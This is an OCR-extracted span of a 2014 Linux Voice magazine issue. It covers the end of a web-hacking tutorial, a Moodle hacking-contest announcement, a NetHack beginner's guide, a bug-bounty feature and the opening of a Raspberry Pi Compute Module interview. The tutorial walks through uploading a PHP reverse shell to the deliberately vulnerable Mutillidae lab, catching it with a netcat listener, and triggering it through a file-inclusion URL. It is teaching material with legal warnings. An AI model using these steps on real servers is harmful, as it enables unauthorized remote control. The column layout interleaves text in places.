user can control: the user agent and the                 I?autoplay=1” frameborder=”0” allowfullscreen></         bar, side menu and footer to create a
page visited. You can control the user agent             iframe>                                                  consistent site across a range of pages.
using the Tamper Data Firefox extension in                 The reason for this sort of attack (other              However, this particular implementation has
exactly the same way that we used it to alter            than pranks) may not be as clear as the                  a bug in it – it processes files as PHP
                                                                                                                  regardless of how they were uploaded, or
                                                                                                                  where they were uploaded to. This can give
  Legalities
                                                                                                                  an attacker control of the system.
  Breaking into websites without permission is           projects’ individual websites for details of how to
  illegal, and in many countries the potential           submit vulnerabilities).
  penalties should you get caught defy reason.              A few companies also offer responsible people
                                                                                                                  Install a reverse shell
  There’s also no excuse, as there are loads of legal    the chance to try to find vulnerabilities on their       In Mutillidae II, go to Others > Unrestricted
  ways to get your hacking fix. There are all the web    websites, and some even offer bounties should you        File Upload > File Upload. This presents you
  apps on the OWASPBWA distro, plus there’s our          find any. For example, take a look at Facebook’s         with a file upload form. We know that we
  hacking challenge (see boxout, right).                 program here: www.facebook.com/whitehat.                 can execute a PHP file anywhere on the
      Once you’re done with that, why not install some      If that’s not enough to encourage you to stay on
                                                                                                                  system, so we just need a file that can allow
  open source webapps on to a virtual machine and        the right side of the law, there’s a list of convicted
  try to find weaknesses? The maintainers will           computer criminals on Wikipedia (http://en.              us to take control: we need a reverse shell.
  undoubtedly be glad to hear of anything you find       wikipedia.org/wiki/List_of_computer_criminals)           This is technique where we get the server to
  provided you report it in the proper way (see the      complete with their sentences.                           communicate with our computer, but we
                                                                                                                  take control, sort of like SSH, but in reverse.



24                                                                      www.linuxvoice.com
                                                                                                              HACK THE WEB FEATURE

  One of the best reverse shells for PHP is
available from http://pentestmonkey.net/
                                                      More fun things to practice on
tools/web-shells/php-reverse-shell. If you            The Broken Web Apps live distro is packed full of      DVWA is one of the most popular apps for
download this and unzip it, you’ll find a file        opportunities to gain skills. A quick click around     introducing different areas of vulnerabilities, and
                                                      the homepage will give you a good idea of what         it a good option to move onto after you’ve
called php-reverse-shell.php. When
                                                      you can do, but we’ve listed our three favourites      conquered Bricks. It’s simple and direct, and
executed, this creates a reverse shell                below. If you get stuck on any of them, there are      introduces the major areas of web app security.
connection with any computer of your                  loads of tutorials on YouTube that should help you     The old version of WordPress is a good chance
choice, so the first thing to set up is the IP        move along.                                            to practice your skills on real code rather than
address for it to connect to. Open it with a             Hackxor is a game that brings together many         code that’s been designed to be vulnerable. In
                                                         web app hacking skills in a narrative. To           fact, once you’ve got an idea of what you’re
test editor, and change the line:
                                                         advance, you’ll have to break into different        doing, all the old software on the OwaspBWA
$ip = ‘127.0.0.1’; // CHANGE THIS                        services to get different bits of information.      VM is a great proving ground.
  So that 127.0.0.1 is replaced with the IP
address of your computer (the IP address
for vboxnet – you should be able to find this       port 1234:                                               This tells you where it is, so if you point
out with the ifconfig command). The                 nc -l 1234                                             your browser to http://192.168.56.101/
second thing you need to do is make your              You can now go back to your web                      mutillidae/index.php?page=/tmp/php-
computer listen for the incoming                    browser and upload the file using the                  reverse-shell.php it will execute the PHP.
connection. This is easiest to do with the nc       upload form. Once it’s successfully                    This should give you shell access to the
command (this should be in your distro’s            uploaded, you should see a new page                    server through the nc command – from
repositories). Run the following command,           containing the line:                                   where you can issue commands as if you
which listens for incoming connections on           File moved to /tmp/php-reverse-shell.php               were the legitimate owner of the server.


Xxxxx xxx xxxxxx xxx xxxx xxx xxxx xxxx
                                            COMPETITION
                              Hack our server, help Moodle, win kudos/prizes


I
      t’s time to put your new-found skills to      installation of Moodle on a real Linux                    We plan to run the contest from 29 June
      the test. Linux Voice has teamed up with      system. As such, there are a few rules we              2014 to 8 July, but we reserve the right to
      Bytemark Hosting and Moodle to try and        need you to follow:                                    finish the contest early (even if the prizes
find vulnerabilities in the Moodle online             Only the server hackthis.linuxvoice.com              haven’t been claimed) should we feel that it’s
course web app. For up-to-date information            is included in the contest. Attacking any            in the best interests of either LinuxVoice or
on everything, keep an eye on                         other machine, (including other Linux                our hosting providers. As with everything,
www.linuxvoice.com/hackattack.                        Voice machines) is strictly forbidden. This          keep an eye on www.linuxvoice.com/
    We’ve selected Moodle because there are           includes spear phishing attacks. Not only            hackattack for the latest information.
a lot of different inputs, which leaves plenty        will you disqualify yourself from the
of space for potential vulnerabilities to hide.       contest, but in extreme cases, we may
It’s also a mature project that’s already been        pass on details to the police.
well tested, so finding vulnerabilities won’t         The server should not be used to as an
be easy. However, even the most secure                intermediary in any further attacks on
projects have a few chinks in their armour.           other servers.
Your task is to find them.                            Keep it clean! We’ll remove any offensive
    There will be three different winners:            messages that appear on the website.
    The person who submits the most                   Responsibly disclose any vulnerabilities
    security bugs to the Moodle bug tracker           you find. We understand that you may
    (only bugs that are verified will count). To      well feel proud should you find a
    be eligible for this, email ben@linuxvoice.       vulnerability, but please remember that
    com with a list of the vulnerabilities you’ve     this version of Moodle is running on real
    discovered by 10 July 2014.                       servers around the world, and the
    There’s a file called steal-me somewhere          developers need time to investigate and
    in the web root (/var/www). It contains a         fix any issues that come up before they’re
    series of instructions. The first person to       announced to the public. Please submit
    follow those instructions will win.               bugs through the proper channels (see
    There’s a file called steal-me somewhere          www.linuxvoice.com/hackattack), and
    outside the web root. Whoever follows the         work with the Moodle security team to                The Linux Voice winner’s T-shirt is only
    instructions contained in it first will win.      pick the best time to let the world know             available to winners of LV competitions.
    This isn’t a simulation – it’s a real             how it worked once a fix has been issued.            Get hacking for your chance to win!



                                                                 www.linuxvoice.com                                                                                25
     FEATURE NETHACK




         THE

         BEST GAME
              OF ALL TIME
                     It’s tremendously addictive. It takes a lifetime to master.
                        And people play it for decades without completing it.
                     Mike Saunders explores the strange world of NetHack…


         B
                  elieve it or not, it’s possible to be terrified by   requirements are absolutely minimal. Now, given that
                  the sight of the letter D. Or ecstatic about the     it looks like utter pants when compared to modern
                  sight of a % character. (And the less said           games, what makes NetHack so appealing? Well, this
         about ^, the better.) But before you assume we’ve             dungeon-exploring masterpiece is incredibly rich and
         gone totally loopy, those characters represent                detailed. There are so many items to discover, spells
         dragons, food rations and traps respectively.                 to cast, monsters to fight and tricks to learn – and
         Welcome to NetHack, where your imagination needs              the dungeons are generated randomly. There’s so
         to play a big role in the gameplay.                           much to explore, and no two games are ever the
           You see, NetHack is a text-mode game: it just uses          same. People play NetHack for years and decades
         the standard terminal character set to portray the            without completing it, still discovering new secrets
         player, enemies, items and surroundings. Graphical            each time.
         versions of the game exist, but NetHack purists tend              Over the next few pages we’ll show you how
         to avoid them – what’s the point of a game if you             NetHack came about, give you a guided tour of the
         can’t play it when you’re SSHed into your revived             dungeons, and show you some tricks. Note: by
         Amiga 3000 running NetBSD?                                    reading this feature, you agree to not sue us when
           In some ways, NetHack is a lot like Vi – it has been        you become addicted to NetHack and your real-life
         ported to nigh-on every platform in existence, and its        productivity is obliterated.



26                                                        www.linuxvoice.com
                                                                                                              NETHACK FEATURE


The oldest still-developed game in existence?
####################################
Despite its name, NetHack isn’t an online game. It’s       with others. Monsters often drop useful items when
based on an earlier dungeon-exploring romp called          you kill them, although some items can have highly
Hack, which in turn was a descendant of a 1980 game        negative effects if you don’t use them correctly. You’ll
called Rogue. NetHack’s first release arrived in 1987,     find shops in the dungeon that are packed with
and although no new features have been added since         potentially useful bits of kit, but don’t expect the
version 3.4.3 in 2003, various patches, add-ons and        shopkeeper to give you great descriptions.
spin-offs are still doing the rounds on the web. This         You’ve got to learn from experience. Some items
makes it arguably the oldest game that’s still being       aren’t much use at all,
hacked on and played by a sizeable group of people.
Go to www.reddit.com/r/nethack to see what we
                                                           and the game is
                                                           packed with a mixture
                                                                                     “What makes NetHack so
mean – long-time NetHack players are still discussing      of slapstick and sly      compelling is the vast range of
new strategies, discoveries and tricks. Occasionally
you’ll see gleeful messages from old timers who have
                                                           humour – you can
                                                           even throw a cream
                                                                                     items crammed into the game.”
finally, after many long years, completed the game.        pie into your own face.
                                                              But before you even set foot in the dungeon,
Never-ending story                                         NetHack asks you what kind of player you want to be.
But how do you complete it? Well, NetHack is set in a      You can take your journey as a knight, a monk, a
large and deep dungeon. You start at the top – level 1     wizard or even a humble tourist, among many other
– and your goal is to keep going down until you find an    player types. They all have their own strengths and
item called the Amulet of Yendor. This is typically in     weaknesses, and NetHack addicts love to try
level 20 or lower, but it can vary. As you traverse        completing the game with the weaker types. (You
through and down the dungeon, you’ll meet all manner       know, to show off to other players.) It also asks you
of monsters, traps and characters; some will try to kill   what kind of “alignment” you want to have, eg lawful or
you, some will stay out of your way, and some… well,       chaotic, which will impact how the beasts you
you don’t know until you get close to them.                encounter respond to you.
   What makes NetHack so compelling is the vast               Before we get started with our first dungeon,
range of items crammed into the game. Weapons,             familiarise yourself with the image below: you may be
armour, spell books, rings, gems – there’s so much to      staring at something very similar for months and
learn, and many items only work best when combined         years to come…



 Navigate the NetHack interface
  Messages
  Because the graphics are limited,
  actions and events in the game are
  described at the top.

  Objects
  @: the player. k: a monster (kobold).
  ^: a trap. %: a corpse or food ration.
  +: a closed door. {: a fountain. < and
  >: steps up and down levels.

  Rooms
  The “.” characters signify empty
  space. Hash (#) symbols show
  corridors between rooms.

  Status
  Top line: your name, rank, strength,
  dexterity, constitution (ability to
  recover from injury), intelligence,
  wisdom, charisma, and alignment.




                                                             www.linuxvoice.com                                                 27
     FEATURE NETHACK


Your first dungeon crawl
####################################
                                 NetHack is available for almost every major OS and
                                 Linux distribution in the world, so you should be able        Spoilers don’t spoil the fun
                                 to grab it with apt-get install nethack or yum install        In NetHack parlance, “spoilers” provide information on
                                 nethack or whatever is appropriate for your distro.           monsters, items, weapons and armour. It’s technically
                                 Then run it in a terminal window by just typing               possible to complete the game without using them, but very
                                 nethack. The game will ask if it should pick a player         few players ever achieve this, as the game is monumentally
                                                                                               complex. Consequently it’s not regarded as bad form to use
                                 type for you – but as a newcomer, it’s best if you
                                                                                               spoilers – but it’s still more fun to try to work things out
                                 choose one of the tougher characters first. So hit “n”        yourself first, and only consult the spoilers when you really
                                 and then hit “v” to choose the Valkyrie type, and “d” to      need them.
                                 be a dwarf.                                                      A great source is www.statslab.cam.ac.uk/~eva/
                                    NetHack will now give you some plot blurb,                 nethack/spoilerlist.html, which separates spoilers into
                                                                                               categories. For things that happen randomly in the game,
                                 explaining that your god seeks the Amulet of Yendor,
                                                                                               such as the effects from drinking from fountains, it gives
                                 so your goal is to retrieve it and present it to him. Hit     you the odds of a certain thing happening.
                                 Space when you’re done reading the text (and any
                                 other time you see “--More--” on the screen). And here
                                 we go – you’re in the dungeon!                              and tasty corpses before you get to them. Now, let’s
                                    As described in the previous page, your character is     go out of the room. There will be gaps around the
                                                                   represented by an @       edge, and possibly “+” signs. That “+” is a closed door,

“If a monster leaves behind a                                      sign. You can see the
                                                                   walls of a room around
                                                                                             so go up to it and hit “o” to open. You will be asked for
                                                                                             a direction, so if the door is to the left of you, press “h”.
corpse (“%”), you can hit comma                                    you, and the dot          (And if the door is stuck, try opening it a few times.)

to take it and “e” to eat it.”                                     characters depict
                                                                   empty space in the
                                                                                             You’ll then end up in a corridor, marked by “#” symbols,
                                                                                             so walk around it until you find another room.
                                                                   room. First of all, get      On your travels you’ll see various items. Some, such
                                 used to the movement keys: h, j, k and l. (Yes, it’s just   as money (denoted by a “$” symbol) are picked up
                                 like Vim, as covered in Linux Voice issue 3!) These         automatically; for other items, you have to press the
                                 move you left, down, up and right respectively. You can     comma key while standing on them. If there are
                                 also move diagonally with y, u, b and n. So walk around     multiple items, you’ll be given a menu, so press the
                                 the room until you get used to the controls.                appropriate keys shown in the menu and then Enter to
                                                                                             choose what you want. At any time you can hit “i” to
                                 What’s behind the door?                                     bring up your inventory list – see the image below-left.
                                 NetHack is turn-based, so if you’re not moving or
Hit “i” to bring up an
                                 performing an action, the game stays still. This lets       Scary monsters
inventory of your currently
                                 you plan your moves in advance. You will see a “d” or       What happens if you see a monster? At these early
carried items. You can use
the letters on the left of the   “f” character moving around the room as well: this is       stages of the game, the monsters you’re likely to come
items with item-specific         your pet dog or cat, which (normally) won’t harm you        across will be represented by “d”, “x” and “:” characters.
commands (such as “e” to         and can assist you in killing monsters. Pets can be         To attack, simply walk into them. The game will tell
eat).                            annoying though – they occasionally eat foot rations        you if your attacks are successful using the messages
                                                                                             along the top – and also how the monster is
                                                                                             responding. These early monsters are simple to kill, so
                                                                                             you shouldn’t have any trouble defeating them, but
                                                                                             keep an eye on your HP (hit points – how much
                                                                                             damage you can take) in the status line at the bottom.
                                                                                                If a monster leaves behind a corpse (“%”), you can
                                                                                             hit comma to take it and then press “e” to eat it.
                                                                                             (Whenever you’re prompted to choose an item, you
                                                                                             can press its corresponding key from the inventory list,
                                                                                             or “?” to bring up a mini list.) Warning! Some corpses
                                                                                             are poisonous, and these are things you’ll learn on your
                                                                                             travels by trial and excruciating error.
                                                                                                If you’re exploring a corridor and appear to come to
                                                                                             a dead end, you can hit “s” to search until you find a
                                                                                             door. This can take ages, however, so you can speed
                                                                                             things up a bit: type “10” and then “s” and you will
                                                                                             perform 10 searches in a row. This takes up 10 moves



28                                                               www.linuxvoice.com
                                                                                                                           NETHACK FEATURE

in game time, however, so if you’re hungry you could
get close to starvation!
   Common items you’ll find in the top levels of the
dungeon are “{“ (fountains) and “!” (potions). For the
former, you can stand on it and hit “q” to “quaff” from it
– the effects can vary from useful to deadly. For
potions, pick them up and then use “q” to drink them. If
you find a shop, you can pick up items and then hit “p”
to pay before leaving. Use “d” to drop something.

Equip yourself
On your travels, and especially after you kill monsters,
you’ll find weapons and armour. Again, use comma to
pick these up, and then “w” (lowercase) to wield a
weapon or “W” (uppercase) to wear a piece of armour.
You can use “T” to remove armour and “t” to throw
weapons – handy if you’re in a very sticky situation.
  Sometimes it’s useful to examine things from a
distance before getting close to them. Hit “;”
(semicolon) and “Pick an object” will appear at the top
of the screen. Use the movement keys until your view
lands on the thing you want to inspect, and then hit “:”
                                                                                                                                If you really can’t get on
(colon). A description will appear at the top.                       the chest. This is also an option for opening locked
                                                                                                                                with NetHack’s bare ASCII
  As your goal is to go further down the dungeon until               doors, although you can do yourself some damage,           graphics, try Falcon’s Eye
you find the Amulet of Yendor, keep an eye out for “<”               and shopkeepers will not be happy bunnies if they’re       (http://falconseye.sf.net)
and “>” signs. These are stairs up and down                          closed for lunch and you smash down their doors…           for a prettier bolt-on
respectively, and you can use the same keys to climb                   If you need a break and want to resume you current       interface.
them. Note! Make sure your pet is standing in an                     game later, use Shift+s (capital S) to save, and then
adjacent square if you want it to follow you into the                type #quit to exit. Next time you run NetHack, your
next level.                                                          game will be resumed.
  Along with the commands we’ve mentioned so far,                      We won’t spoil what’s ahead, as many of the
there are some extra operations that begin with the “#”              dungeon levels have amazing designs, characters and
(hash) character. For instance, if you come across a                 secrets. So we’ll leave you with three tips: if you come
chest or box, you can enter “#loot” when standing on                 across an item that completely baffles you, try
top of it to peek inside. If the box is locked, however,             searching for it on the NetHack wiki at http://nethack.
and you don’t have a key, you need to use some good                  wikia.com. You’ll find an excellent (albeit very long)
old-fashioned brute force. Stand to one side of the box,             guidebook at www.nethack.org/v343/Guidebook.
press Ctrl+d, and then a direction. This makes your                  html, and a highly useful cheat sheet of keyboard
player kick in the specified direction – if you do this              commands on the inside back page of this very
correctly, and perhaps a few times, you will break open              magazine. Happy exploring!


  Stupid ways to die
  A popular acronym amongst NetHack players is “YASD” – Yet
  Another Stupid Death. It describes a situation where the
  player buys the farm due to his/her own silliness or lack of
  concentration. We’ve had many of these, but our favourite
  went as follows:
     We were browsing a shop, inspecting items, when a snake
  suddenly jumped out from behind a potion. After killing the
  snake, a message popped up saying that we were getting
  hungry, so we opted to eat the snake’s corpse. Bad idea! This
  made us blind, so we couldn’t see other characters or items in
  the shop. We tried to get to the exit, but instead bumped into
  the shopkeeper and accidentally attacked him. This made
  him furious; he started firing magic missiles at us. We just
  about managed to get into the corridor outside the shop, but
  died from the onslaught.
     If you come to any equally silly ends, let us know on
  http://forums.linuxvoice.com. And don’t worry – nobody             A familiar sight: your tombstone. After every death, you
  will judge you. Dying like this is all part of growing up in the   can find out more about unidentified items that you were
  NetHack world.                                                     carrying, so you learn more about the game.



                                                                       www.linuxvoice.com                                                                29
     FEATURE BUCKS FOR BUGS!




                           BUCKS FOR

                     Want to have your cake and eat it too? Mayank Sharma
                     explores bug bounty websites and how you can fill your
                            coffers and your karma at the same time.



          B
                   ack in the American Wild West (or at least as     was maintained by only a small group of volunteers
                   depicted by the films) when law enforcement       with very little funding, and there was only one person
                   agencies didn’t have the resources to track       working full-time on the project.
          down outlaws, they offered cash rewards or bounties          Experts estimate that the Heartbleed bug will cost
          for their capture. Fast forward to the age of technology   businesses tens of million of dollars in lost productivity
          and companies are offering similar incentives with a       as they update systems with safer versions of
          small difference – the wanted outlaws are malicious        OpenSSL. As a fallout of Heartbleed, a new group set
          pieces of software code and the vigilantes after them      up by the Linux Foundation has so far raised around
          are a worldwide army of software developers.               $3m (£1.7m) with contributions from tech companies
             Several tech giants                                                                       including Google,
          including Google, Yahoo,
          Microsoft and Facebook
                                      “Several tech giants including                                   Facebook, Microsoft,
                                                                                                       Intel, IBM, Cisco and
          offer bounties for          Google, Yahoo and Facebook                                       Amazon. These
          weeding out and
          eliminating bugs in their
                                      offer bounties for weeding out                                   companies will pitch in
                                                                                                       $300,000 over the next
          software. And bug           and eliminating bugs.”                                           three years. Besides
          bounties aren’t limited to                                                                   maintaining OpenSSL,
          big software companies.                                                                      the fund will also be
          Open source software projects also offer bounties on       used to support development of other crucial
          bugs that plague their software. This may not make         open-source software.
          much sense at first, considering the benevolent nature
          of the open source software development community,         Scope of bounties
          whose members work on projects to satisfy their own        But what role do bug bounties play in the larger open
          particular itch.                                           source development ecosystem? We asked Tony
             Perhaps the biggest example of this – organisations     França, who runs FreedomSponsors (https://
          clubbing together to fund the development of a feature     freedomsponsors.org), which is one of the most
          – has come out of the Heartbleed bug in OpenSSL.           popular bug bounty websites dedicated to open
          The OpenSSL project plays a crucial role in the proper     source software. França explains that the effect of the
          and secure functioning of the internet. Yet the project    bounties varies greatly from project to project.




30                                                      www.linuxvoice.com
                                                                                                  BUCKS FOR BUGS! FEATURE

    He illustrates by comparing LibreOffice with the                                                                    Tony França pats
Jenkins project: “LibreOffice gets enough funding from                                                                  himself on the back
companies, so the money coming from bug bounties                                                                        every time he sees a
is really a small fraction of that. Now compare that                                                                    new feature in software
with the Jenkins project where we have helped resolve                                                                   that was made possible
12 of 88 issues. Jenkins officially adopted                                                                             because of a bounty on
                                                                                                                        FreedomSponsors.
FreedomSponsors as a bug bounty platform (every
issue on their JIRA has a link to be sponsored on
FreedomSponsors). Because of that, they get more
bounties, but those are spread among more issues, so
it’s still not enough to get the developers’ attention to
an individual issue’s bounty.”
    But there are some exceptions to this, especially
when a bug affects an important library. “There are
occasions where a feature is so important that
bounties start to add up organically. This is what
happened with the ‘OTR encryption support for
Telepathy’ feature. As far as I can tell, people just
randomly started to offer money for that feature, until     Indiegogo, which have successfully hosted many open
a developer named Xavier Claessens went ahead and           source fundraisers, the website’s CEO Warren Konkel
implemented it.”                                            noted in an interview with OpenSource.com that
    “So, generally speaking, bug bounties still play a      FOSS needs a “better funding model that’s more
small role in the FOSS development ecosystem”, he           aligned with how software is built.” Both BountySource
concludes. However, França believes that this is            and FreedomSponsors integrate with services popular
mainly because of lack of marketing of the bounties:        with developers, such as GitHub and Bugzilla.
“The users who realise that they can place bounties for        Fundraisers on BountySource are time-limited
solutions to problems they see every day is still a small   campaigns that aim to raise money for a specific goal,
group. But we’re growing. Slowly, but surely.”              such as the next major release of an open source
    Another bounty website specialising in open source      application. Unlike other platforms, BountySource also
software is BountySource (www.bountysource.com).            handles the pledge rewards for the project; so if a
In addition to encouraging end users and developers         project is offering T-shirts to contributors, the website
to support their favourite projects with their wallets or   will take care of the printing and shipping.
skills, the company also works with corporate donors           However, when LV spoke to him, Konkel said that he
who are interested in certain open source projects that     believes the future of crowdfunding in open source is a
are an integral part of their business.                     bounty-based model: “Issue trackers can quickly
    The website currently hosts over 500 bounties           become overwhelming and bounties allow backers to
ranging from $50 to well over $1,000. In addition to        focus development efforts on the issues that matter
bounties, BountySource also hosts fundraisers for           to them.” In the OpenSource.com interview Konkel
open source projects. Explaining its USP over               notes that, generally speaking, there are more bounties
traditional crowdfunding platforms like Kickstarter and     on bugs than on feature requests: “This seems to be
                                                            normal behaviour, as developers will often encounter a
                                                            bug and want an immediate resolution.”

                                                            Fostering interactions
                                                            Konkel adds that bounties often lead to a flurry of
                                                            comments that end up fleshing out the details behind
                                                            a feature request: “With bounties, developers can
                                                            quickly understand what a community is most
                                                            interested in seeing improved.”
                                                               Philip Horger, one of the leading contributors at
                                                            FreedomSponsors, illustrates the importance of
                                                            communication in creating effective bounties. When
                                                            he put up a bounty to improve the LibreOffice user
                                                            interface, a member of the actual LO team showed up
                                                            and advised everybody that sponsoring such a
                                                            wide-scope issue was, while an encouraging sign for
                                                            the developers, not a realistically useful way of making
                                                            user interface improvements happen. He advised that
Robert Roth is a Java developer who divides his free time   Horger should in fact sponsor more specific
between playing the guitar and collecting bug bounties.     improvements. “So I broke up my offer among more



                                                              www.linuxvoice.com                                                                  31
     FEATURE BUCKS FOR BUGS!

                                                                                                       person putting the bounty and the maintainers of the
                                                                                                       project: “If you are willing to communicate and iterate
                                                                                                       your patches, the contributions are always welcome.”
                                                                                                          França, on the other hand, doesn’t see too many
                                                                                                       discussions. “One would think that there would be a lot
                                                                                                       of interaction between sponsors and developers on
                                                                                                       bug bounties, but what happens is quite the opposite.
                                                                                                       Most of the conversations we see on paid bounties
                                                                                                       are just quick progress reports and people thanking
                                                                                                       each other – there’s not much talk about how the
                                                                                                       problem will be fixed.”
                                                                                                          He pins this on two factors. For starters “when a
                                                                                                       task comes to the point of being sponsored, it’s
                                                                                                       already very well defined so there’s really no need to
                                                                                                       discuss it further.” Secondly, he believes that a bug
                                                                                                       bounty platform is not the right place to discuss
                                                                                                       solutions: “You should use the project’s issue tracker
                                                                                                       for that. It would be bad for project management if the
The Elementary OS
                                 specific sponsorships and revoked the old one. The                    requirements for an issue were documented on
project uses the donations
it receives to put up            total sponsorship was the same in the end, but more                   FreedomSponsors instead of the project’s own issue
bounties.                        usefully distributed.”                                                tracker! I guess people just understand that and use
                                   Robert Roth, a software developer from Romania,                     the right place for the right conversation.”
                                 has worked on and collected several bounties on
                                 BountySource. While working on the bounties of the                    Encouraging developers
                                 Elementary OS project, Roth says the developers and                   Besides helping open source projects improve the
                                 designers from the project provided useful feedback,                  quality of their software, bug bounties also offer an
                                 usually in a matter of hours, and suggestions in case                 opportunity to young and talented developers to
                                 the fixes were not perfect. That’s mostly because the                 showcase their skills and make some cash.
                                 bounties were put up by the developers of the                           Roth, a full-time Java developer with a young family,
                                 Elementary OS itself. “So the requests are valid                      became a bounty hunter when he was on the lookout
                                 requests. You won’t have to convince the maintainers                  for some extra cash. “I was investigating how one
                                 that a feature will be used, and they will most likely be             could get paid for working on open source software,
                                 accepted, after the fix is validated by a developer.”                 and found that there are various possibilities. Reading
                                   This is in stark contrast to the bounties he has                    about all of them, I found that the option provided by
                                 worked on for larger projects such as Gnome. “In                      BountySource was the best fit for me – getting paid
                                 these cases usually the person putting up the bounty                  for occasional bugfixes, whenever I have time, while
                                 validated the fix or requested various improvements                   improving free software by adding features and fixing
                                 quickly, but with the maintainers being fairly busy,                  bugs that are important for other users.”
                                 getting a proper review and getting the patch to be                     Recalling his motivations behind starting
                                 accepted and committed takes longer (days, or even                    FreedomSponsors, França says that one day while
                                 weeks, and even up to 1–2 months).”                                   playing with an issue with Jenkins’ OpenID plugin, he
                                   Roth concludes by saying that all the bounties he’s                 ran into a documented bug. “Maybe I could try to
                                 worked on have received attention from both the                       debug it, but boy that would take a long time, I mean I


  Bug bounties on the tech high street
  A security hole in a big product such          engineer in Brazil for unearthing an error
  as Facebook could have far-reaching            that could have allowed access to almost
  consequences if the information made its way   any file on Facebook’s servers. Yahoo too
  to the cyberspace black market. Which is why   wised up after a firm discovered four critical
  a lot of tech companies announce bug bounty    vulnerabilities in their offerings, and instead of
  programs to encourage white hat security       T-shirts now pays bounties of up to $15,000.
  researchers and developers to share the           Google has broadened its bug bounty
  information in exchange for money and fame.    program to cover all Chrome apps and
     These public programs increase the          extensions made by company. It has also
  chances of discovering exploits and            upped payments for its Patch Rewards
  vulnerabilities. Companies including           Program, which focuses on improving
  Facebook, Google and Yahoo offer thousands     security for select open source projects.
  of pounds in rewards for finding software      The company will now offer $5,000 for
  vulnerabilities, based on how damaging the     moderately complex patches, and $10,000 for
  discovered vulnerabilities are. Facebook       complicated improvements that prevent major          From a security standpoint, public bug bounty programs lead to
  recently awarded a bounty of $33,500 to an     vulnerabilities in the code.                         broader coverage of scrutiny on the app.




32                                                                   www.linuxvoice.com
                                                                                                 BUCKS FOR BUGS! FEATURE




   Web www.bountysource.com                          Web http://freedomsponsors.org                   Web www.catincan.com
   Funding model Bounty/All or Nothing               Funding model Bounty                             Funding model All or Nothing
   Fees 10% non-refundable fee for placing           Fees 3% + payment processing fees                Fees 10% after funding amount has
   bounties                                          Payments Bitcoin and PayPal                      been reached.
   Payments Bitcoin, PayPal, cheque,                 About Enables several users to chip in           Payments Bitcoin, PayPal, wire transfer
   Google Wallet, wire transfer                      to a bounty. Bounties are paid only after        About Only allows developers of existing
   About Designed for crowdfunding bugs              the sponsors have verified the work.             projects to create campaigns. Features
   and features in open source software,             Uses PayPal’s parallel payment type to           are screened and developers have 60
   and is used to fund for new projects.             split bounties between developers.               days to reach the funding goal.



had never even looked at Jenkins code before. Then I        projects can put up a bounty. While users not
thought there could be some people out there that           associated with the project can make suggestions, a
would be willing to even pay a few bucks to whoever         proposed feature cannot be shifted into funding mode
fixed it. The moment I thought that, a storm of ideas       until one of the project developers is ready to take on
came rushing into my head. Someone should build a           responsibility for completing it. This makes the
website for that. So I did.”                                platform ideal for managing feature requests and
   Horger, who also donates directly to various             creating funding opportunities for open source
projects, shares another interesting perspective            projects. Also, the website doesn’t charge developers
comparing bounties with traditional donation.               any fees for putting up a bounty.
“Sponsoring on FreedomSponsors is inherently more             In contrast, both BountySource and
fine-grained and personal than donating. Your offer is      FreedomSponsors are open to users and projects.
tied to a specific and achievable outcome, which            Anyone can put up bounties, contribute to an existing
means you feel stake and responsibility in that             bounty and collect the bounty after successfully
sponsorship’s success. It is more gratifying and            squashing the bug.
tangible to be able to point to some distinct feature of      In a reassuring sign that the system works, both
some popular program, and say to the person next to         BountySource and FreedomSponsors use their
you, “I helped make that happen.”                           respective platforms to improve themselves by putting
   Horger also has an interesting use for the bounties.     up bounties on components that power them. The
He puts up bounties for his own projects! It might          logo of FreedomSponsors, and its Bugzilla plugin, are
sound odd for a developer to pay others to do things        two examples of improvements that came about this
he could more easily do himself. But Horger says            way. BountySource too
rewarding external development allows him to foster a
community around his projects. This “not only will take
                                                            uses software that it
                                                            has helped fund, such
                                                                                         “A bounty is created either to
programming and maintenance load off of me in the           as the JSHint syntax         fix a bug in software or add a
long run, but also means that my projects can easily
live on if I get hit by a bus!”
                                                            checker, and also puts
                                                            up bounties on
                                                                                         feature to a project.”
                                                            software it uses
Putting up a bounty                                         including Textmate and AngularJS.
All bug bounty websites function in a similar way. A          At first glance, writing code for money seems to be
bounty is created either to fix a bug in software or add    against the ethos of free and open source software.
a feature to a project. Once the bounty is created,         But if you look at it, money has been a part of open
users can contribute towards that bounty. That’s when       source for quite some time. Many open source
a developer comes along and fixes that bug or adds          developers are paid by their employers to work on
that feature and checks the changes to the website          open source software. Others have consulting
revision control system. Once the changes have been         businesses around their projects. As long as good
merged into the project, the developer gets paid.           quality code makes its way into a project and
   Catincan (www.catincan.com) is another bug               improves it, the motivations behind the code shouldn’t
bounty website that looks after open source projects.       matter. Bug bounties provide the ideal avenue for
However, unlike the other two bug bounty websites,          users to make identifiable contributions to their
only active developers on existing open source              favourite projects.



                                                              www.linuxvoice.com                                                                 33
     FEATURE RASPBERRY PI COMPUTE




         RASPBERRY PI
                           Les Pounder gets exclusive access to the latest
                              board from the Raspberry Pi Foundation.



         O
                   n 7 April the Raspberry Pi Foundation            by the end user. The original Raspberry Pi form factor,
                   announced a new device to join the family.       while meeting the needs of the end user, has been
                   But it was not what we were expecting: many      adapted to serve the needs of various projects across
          thought that there would be an upgrade to the             the globe. It’s perfect for makers and hobbyists, but
          hardware, with more                                                                      the original Raspberry Pi
          RAM and processing
          power and an extra USB
                                     “The original Raspberry Pi form                               form factor is not as
                                                                                                   flexible as a smaller,
          port, maybe. But instead   factor is not as flexible as a                                more modular device
          we got something very
          different and totally
                                     smaller, more modular device.”                                and this is where the
                                                                                                   Compute Module comes
          unforeseen.                                                                              into its own.
             The Compute Module is a full Raspberry Pi model A        Linux Voice was privileged to get hold of a
          shrunk down into a printed circuit board (PCB) the size   development board from the Raspberry Pi Foundation
          of a laptop SODIMM (small outline dual-inline memory      as well as access to James Adams, the lead for this
          module). The goal of the module is to put the             project (who at the time was on paternity leave but still
          technology of the Pi at the heart of commercial and       responded to our emails) to grill him about the ideas
          serious hobbyist ‘internet of things’ projects via a      that formed this new device from the Raspberry Pi
          smaller module that can be added to a PCB designed        Foundation, and to find out what makes it so special.



34                                                     www.linuxvoice.com
                                                                                                     RASPBERRY PI COMPUTE FEATURE

       Hi James, thanks for taking the time away
       from your new baby to answer a few
questions about your other new baby. What was
the driving force that inspired the team to create
the Compute Module?
James Adams: It was a combination of factors.
When I joined The Raspberry Pi Foundation in
February 2013 to head up hardware design, I already
had in my mind that this kind of product would be
really great and allow people to leverage the Pi
software and hardware into new products and form
factors. Meanwhile there were also internal
discussions at the Foundation about creating a
smaller or more embeddable unit.
   In the end we chose to go with the SODIMM module
form factor and provide something that, although it
